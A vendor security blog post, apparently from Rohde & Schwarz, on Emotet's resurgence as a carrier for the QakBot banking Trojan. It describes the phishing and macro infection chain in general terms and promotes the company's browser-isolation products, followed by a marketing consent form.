Emotet is dead, long live Emotet?

Emotet is dead, long live Emotet? New threat from banking Trojan QakBot (QBot)

Barely more than half a year after Emotet's self-deletion, the botnet is now active again and spreading terror among financial institutions and service providers as the banking Trojan QakBot (QBot). Emotet, which just a few years ago was called the "king of malware" by Arne Schönbohm, President of the German Federal Office for Information Security (BSI), is notorious in the field of cybercrime, as BKA situation reports on cybercrime from previous years also testify.

Started as a banking Trojan to illegally obtain access data, Emotet evolved into a botnet over the years. After being quiet for some time, methods already known from Emotet resurfaced. Tens of thousands of e-mails with links or file attachments containing malicious macros were distributed.

Up to 250,000 of these official-looking malware emails were circulated every day. Particularly perfidious, and already known since Emotet, is that these mails are often sent as replies to mail threads, so-called dynamite phishing. If a recipient now tries to open the mail with the zip attachment or link, he is prompted to activate macros that are disabled by default.

If this is done, Windows Management Instrumentation launches a PowerShell to retrieve the Emotet binary from one of the compromised WordPress sites. After this initial infection, additional malware is downloaded - in the current case, the banking Trojan QakBot. QakBot targets businesses from which large sums of money are stolen after spying on users' banking activities.

How can you protect yourself from QakBot?

The quality of fake mails is getting better and better and they will fit into existing communication histories more and more. A major source of danger is therefore the ill-considered opening of files and attachments and clicking on links in mails. There is an acute risk of infecting a company's entire network with malware or ransomware as a result.

Secure your browser against network threats

Traditional security barriers such as antivirus software offer little protection against the perfidious attack patterns of botnets that spread emails with malicious links.

We therefore recommend the triple protection of

  • proactive security that protects against browser-based cyberattacks (APTs, zero-day exploits, ransomware)
  • protection against malware and data leaks through complete virtualization
  • secure separation of Internet, operating system and corporate network

You can learn more about this, for example, in our successful webinar "Emotet & Co. - Why you don't need to worry", which is also applicable to the current QakBot.

Or feel free to contact us, we will be happy to advise you on proactive protection options against zero-day exploits, ransomware, viruses and Trojans that take place via a browser or the website visited.

By the way, Kaspersky has compiled IP addresses of already known Qakbot C2 servers as a list. If you can, they monitor suspicious activity. Of course, we will be happy to advise you on this cybersecurity protection measure as well.

Request information

Do you have questions or need additional information? Simply fill out this form and we will get right back to you.

Marketing permission

I want to receive information from Rohde & Schwarz via

What does this mean in detail?

I agree that Rohde & Schwarz GmbH & Co. KG and the Rohde & Schwarz entity or subsidiary company mentioned in the imprint of this website, may contact me via the chosen channel (email or postal mail) for marketing and advertising purposes (e.g. information on special offers and discount promotions) related to, but not limited to, products and solutions in the fields of test and measurement, secure communications, monitoring and network testing, broadcast and media, and cybersecurity.

Your rights

This declaration of consent may be withdrawn at any time by sending an email with the subject "Unsubscribe" to news@rohde-schwarz.com. Additionally, a link to unsubscribe from future email advertisements is contained in each email sent. Further details on the use of personal data and the withdrawal procedure are set out in the Statement of Privacy.

Your request has been sent successfully. We will contact you shortly.
An error has occurred, please try again later.